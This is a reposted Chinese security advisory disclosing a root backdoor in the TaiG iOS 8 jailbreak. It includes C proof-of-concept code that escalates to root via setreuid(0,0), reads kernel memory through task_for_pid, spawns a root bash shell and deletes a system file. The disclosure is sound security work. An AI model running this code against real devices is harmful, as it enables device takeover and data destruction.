博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
太极越狱重大安全后门
阅读量:6268 次
发布时间:2019-06-22

本文共 2340 字,大约阅读时间需要 7 分钟。

路人甲 · 2015/07/01 19:05

0x00 背景


太极越狱iOS8.1.3-8.4含有重大安全后门,越狱后导致任意APP可以提权到Root,从而影响用户数据的安全。举例来说获取Root权限后可以完全控制系统文件,甚至进一步安装木马等严重威胁用户安全的恶意软件。

0x01 细节


具体分析结果显示太极越狱修改了setreuid这个关键系统API,导致任意APP都可以直接调用setreuid(0,0)获得Root执行权限,从而可以修改任意系统文件、也可以task_for_pid打开系统内核句柄从而完全控制系统底层。例如通过写入系统目录“/Library/LaunchDaemons”可以注册系统服务,从而植入木马、病毒、盗号工具威胁用户隐私数据和密码。

漏洞重现演示如下图:

示例一:通过test_taig_backdoor1程序读取内核内存

示例二:通过test_taig_backdoor2获得root权限shell

test_taig_backdoor读取任意内核poc代码:

#!c#include 
#include
#include
#include
#include
#include
#include
#include
void dump_kernel_memory(vm_address_t addr){ kern_return_t kret; mach_port_t proc_task = 0; vm_size_t ret_size = 0; vm_size_t i; char buffer[128] = {0}; int ret; ret = task_for_pid(mach_task_self(), 0, &proc_task); if (ret != 0) { NSLog(@"[err] get tfp0 fail: %d", ret); return; } NSLog(@"task for pid 0 = %u", proc_task); kret = vm_read_overwrite(proc_task, addr, sizeof(buffer), (vm_address_t)buffer, &ret_size); char *info = malloc(4096); info[0] = '\0'; for (i = 0; i < ret_size; i++) { if (i % 16 == 0) sprintf(info + strlen(info), "\n%p: ", (void *)(addr + i)); sprintf(info + strlen(info), "0x%02x ", *(uint8_t*)(buffer + i)); } NSLog(@"%s", info); free(info);}int main (int argc, const char * argv[]){ if (argc != 2) { NSLog(@"%s [kernel_address]", argv[0]); return 0; } NSLog(@"current uid=%d euid=%d", getuid(), geteuid()); /* * taig backdoor test */ setreuid(0,0); NSLog(@"now uid=%d euid=%d", getuid(), geteuid()); vm_address_t addr = strtoul(argv[1], NULL, 16); dump_kernel_memory(addr); return 0;}复制代码

test_taig_backdoor2提权poc代码:

#!cvoid get_root_shell{    setreuid(0,0);    system("/bin/bash -i");}复制代码

在APP中添加下面的代码进行删除文件测试(谨慎执行):

#!cvoid testBackdoor(){NSLog(@"当前运行进程 uid=%d euid=%d", getuid(), geteuid());setreuid(0,0);NSLog(@"后门提权后,当前运行进程 uid=%d euid=%d", getuid(), geteuid());NSLog(@"删除任意文件演示(该测试会导致Cydia无法运行,请谨慎执行)");unlink("/Applications/Cydia.app/MobileCydia");}复制代码

太极越狱iOS8.0-8.1.1未能找到机器进行测试,可能也有此重大后门。

0x02 总结


越狱软件中藏有安全后门并非没有先例。早在针对iOS 7的完美越狱工具evasi0n7中,越狱开发者evad3rs就修改了第0号系统调用,导致任意app可以轻易获得内核代码执行的能力。这一做法也引起越狱大神winocm的强烈不满()。早在2014年Winocm在博文中就已经质疑太极是否在利用这个后门。

太极越狱与evad3rs的“绯闻”一直没有间断。据福布斯报道()(), 太极曾支付evad3rs高达一百万美金用于越狱合作开发,该合作的产物就是evasi0n7强制安装“太极助手”的闹剧。至于太极越狱的安全后门是“惯犯”还是“初犯”的谜底恐怕就无法揭开了。

转载地址:http://mgppa.baihongyu.com/

你可能感兴趣的文章
iOS开发多线程--(NSOperation/Queue)
查看>>
php的ajax简单实例
查看>>
maven常用构建命令
查看>>
C#:关联程序和文件
查看>>
推荐科研软件
查看>>
gradle
查看>>
如何取消未知类型文件默认用记事本打开
查看>>
[Javascript] Immute Object
查看>>
Java 关于finally、static
查看>>
Posix mq和SystemV mq区别
查看>>
P6 EPPM Manual Installation Guide (Oracle Database)
查看>>
XMPP协议、IM、客户端互联详解
查看>>
PHP写文件函数
查看>>
mysql的sql_mode合理设置
查看>>
函数连续性与可导性
查看>>
linux下libevent安装
查看>>
用ip来获得用户所在地区信息
查看>>
卡尔曼滤波
查看>>
linux下面覆盖文件,如何实现直接覆盖,不提示
查看>>
CSS3阴影 box-shadow的使用和技巧总结
查看>>